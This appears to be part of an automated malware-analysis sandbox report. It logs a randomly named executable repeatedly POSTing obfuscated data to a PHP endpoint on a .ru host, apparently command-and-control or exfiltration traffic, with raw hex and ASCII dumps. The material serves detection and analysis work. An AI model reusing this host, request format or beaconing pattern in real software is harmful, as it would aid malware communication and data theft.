                                                                                            Nov 5, 2024 23:53:13.618491888 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:11 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            46192.168.2.44985937.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:13.746817112 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:14.102423906 CET1024OUTData Raw: 53 51 5a 5d 53 5b 55 5e 5a 5f 52 51 54 5b 5b 5f 55 56 59 5e 51 5e 52 52 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SQZ]S[U^Z_RQT[[_UVY^Q^RRTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&,"T+<')\!Y>>_08Y !+.(:(]4$"_&9'X$.Q-"


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            47192.168.2.44986437.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:14.500173092 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1284
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:14.852369070 CET1284OUTData Raw: 53 54 5f 58 56 5f 50 5c 5a 5f 52 51 54 52 5b 53 55 5d 59 5e 51 53 52 5c 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: ST_XV_P\Z_RQTR[SU]Y^QSR\TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%/2+;+7*\5=>*'+#<=<- ,&$\74!%'X$.Q-
                                                                                            Nov 5, 2024 23:53:15.319000959 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:15.391180038 CET308INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:13 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 152
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 00 1e 20 58 2b 3a 21 03 24 38 24 18 28 3e 29 10 28 33 3c 03 2f 1c 33 03 2a 0d 20 59 29 06 05 09 20 11 30 07 22 21 2e 04 20 1c 27 12 3f 01 21 5f 05 1d 39 5f 24 29 0d 09 2a 22 00 5e 3e 19 30 46 32 20 0e 09 29 28 2e 5c 34 3a 03 0e 32 07 2e 01 31 1c 30 0c 3f 34 0b 17 39 2f 2b 1c 26 00 2a 57 09 16 20 1c 30 23 01 59 29 22 2c 07 27 3e 3d 12 25 04 0d 1f 3e 3c 28 04 23 0a 0c 59 2a 33 05 58 35 09 3d 04 24 04 2d 1b 25 58 34 0e 2b 32 26 55 22 0d 20 54 01 30 5d 4f
                                                                                            Data Ascii: X+:!$8$(>)(3</3* Y) 0"!. '?!_9_$)*"^>0F2 )(.\4:2.10?49/+&*W 0#Y)",'>=%><(#Y*3X5=$-%X4+2&U" T0]O


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            48192.168.2.44986637.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:14.620839119 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:15.002820015 CET1024OUTData Raw: 53 54 5a 5a 53 5f 50 5b 5a 5f 52 51 54 59 5b 5f 55 56 59 5f 51 5e 52 52 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: STZZS_P[Z_RQTY[_UVY_Q^RRTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%/5+;+? ):=->3;77:<-7X.;#Q"X1'X$.Q-*
                                                                                            Nov 5, 2024 23:53:15.444096088 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:15.517302990 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:13 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            49192.168.2.44987337.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:15.640878916 CET309OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:53:15.992999077 CET1024OUTData Raw: 56 53 5f 58 56 5c 50 5c 5a 5f 52 51 54 5e 5b 5b 55 5c 59 58 51 53 52 5d 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VS_XV\P\Z_RQT^[[U\YXQSR]TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&/,.U?8^<3?(9)Z==3;#4?*V(>(.#74!2)'X$.Q-6
                                                                                            Nov 5, 2024 23:53:16.453126907 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:16.526315928 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:14 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            50192.168.2.44988037.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:16.797646999 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:17.149292946 CET1024OUTData Raw: 56 5e 5f 5b 53 5a 50 5a 5a 5f 52 51 54 59 5b 5a 55 52 59 5a 51 52 52 5a 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: V^_[SZPZZ_RQTY[ZURYZQRRZTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%^/Y>V?8+ +)*-]'^4Z4%<>96 4$&]2)'X$.Q-*
                                                                                            Nov 5, 2024 23:53:17.620317936 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:17.698156118 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:15 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            51192.168.2.44988637.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:18.121941090 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:18.477348089 CET1024OUTData Raw: 56 52 5a 5a 56 5e 50 5a 5a 5f 52 51 54 52 5b 5a 55 52 59 5f 51 53 52 5f 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VRZZV^PZZ_RQTR[ZURY_QSR_TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%/>+(#)\>>3^( *<?[9 '%9'X$.Q-
                                                                                            Nov 5, 2024 23:53:18.944107056 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:19.018728018 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:16 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            52192.168.2.44989237.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:19.155848026 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1016
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:19.508780003 CET1016OUTData Raw: 53 53 5a 5d 56 57 50 59 5a 5f 52 51 54 5a 5b 5f 55 55 59 59 51 50 52 5f 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SSZ]VWPYZ_RQTZ[_UUYYQPR_TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%^/<.=8#(<\)=[*[0$^7?*<-+X95<Y4'2'X$.Q-2
                                                                                            Nov 5, 2024 23:53:19.968940973 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:20.041867018 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:17 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            53192.168.2.44989837.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:20.418812990 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1284
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            54192.168.2.44990037.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:20.630412102 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:20.977374077 CET1024OUTData Raw: 56 50 5a 5e 56 5e 50 59 5a 5f 52 51 54 5f 5b 5f 55 55 59 57 51 50 52 53 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VPZ^V^PYZ_RQT_[_UUYWQPRSTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&;?2W<0_<# [*96?-%+< ?&P+.<4.\%)'X$.Q-2
                                                                                            Nov 5, 2024 23:53:21.444396973 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:21.518661976 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:19 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            55192.168.2.44990937.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:21.675808907 CET309OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:53:22.024342060 CET1024OUTData Raw: 53 54 5a 5e 56 59 55 59 5a 5f 52 51 54 59 5b 5b 55 5d 59 56 51 55 52 5c 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: STZ^VYUYZ_RQTY[[U]YVQUR\TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%,=+8^<0=))Z=-938 %+,-0] _&)'X$.Q-*
                                                                                            Nov 5, 2024 23:53:22.486474037 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:22.562428951 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:20 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            56192.168.2.44991637.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:22.857980013 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:23.217737913 CET1024OUTData Raw: 56 57 5a 5f 53 5f 55 5d 5a 5f 52 51 54 58 5b 58 55 50 59 57 51 55 52 59 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VWZ_S_U]Z_RQTX[XUPYWQURYTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&,R=88X<0$Z):)>\3? ?<-+]:+#7')'X$.Q-.
                                                                                            Nov 5, 2024 23:53:23.670419931 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:23.743163109 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:21 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            57192.168.2.44992237.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:23.872757912 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:24.227415085 CET1024OUTData Raw: 56 51 5f 58 53 5d 50 5c 5a 5f 52 51 54 59 5b 59 55 55 59 57 51 53 52 5c 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VQ_XS]P\Z_RQTY[YUUYWQSR\TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%//!((3<#<*)*?-0+ 9<+-5Y72^&'X$.Q-*
                                                                                            Nov 5, 2024 23:53:24.685395956 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:24.764105082 CET158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:22 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            58192.168.2.44992837.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:24.931308031 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:25.290458918 CET1024OUTData Raw: 53 53 5f 58 56 5c 50 53 5a 5f 52 51 54 5b 5b 53 55 5c 59 58 51 53 52 5c 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SS_XV\PSZ_RQT[[SU\YXQSR\TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&;<!?<X<4=!==.'(#2(X+.%?#$21'X$.Q-"
                                                                                            Nov 5, 2024 23:53:25.740813017 CET25INHTTP/1.1 100 Continue


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            59192.168.2.44993237.44.238.250802212C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 5, 2024 23:53:25.637578964 CET333OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1264
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:25.992968082 CET1264OUTData Raw: 53 54 5f 59 56 58 55 5a 5a 5f 52 51 54 5c 5b 52 55 56 59 58 51 5e 52 53 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: ST_YVXUZZ_RQT\[RUVYXQ^RSTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&-,"S=;<(3>\.>&_38Y4%?> 9&# "%'X$.Q->
                                                                                            Nov 5, 2024 23:53:26.453510046 CET25INHTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:26.532166958 CET308INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:24 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 152
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 00 1e 20 5c 3c 14 04 13 24 3b 0d 0d 28 2e 3d 5e 28 1e 33 5c 38 32 24 5a 3e 1d 38 59 2a 5e 30 52 37 3f 28 07 22 54 36 05 20 0c 24 00 28 01 21 5f 05 1d 39 11 30 00 30 57 3d 32 21 06 3d 37 2b 18 31 56 3f 1d 2a 2b 36 58 20 5c 35 0b 32 3e 26 02 26 1c 2f 51 3f 1a 0f 18 39 01 0e 09 25 2a 2a 57 09 16 23 09 24 1d 38 03 28 32 2f 5a 24 2d 3d 10 25 2a 24 0c 2a 3c 23 1f 20 0a 39 00 29 23 3c 03 36 27 26 5a 30 3a 03 1c 25 10 3c 09 28 08 26 55 22 0d 20 54 01 30 5d 4f
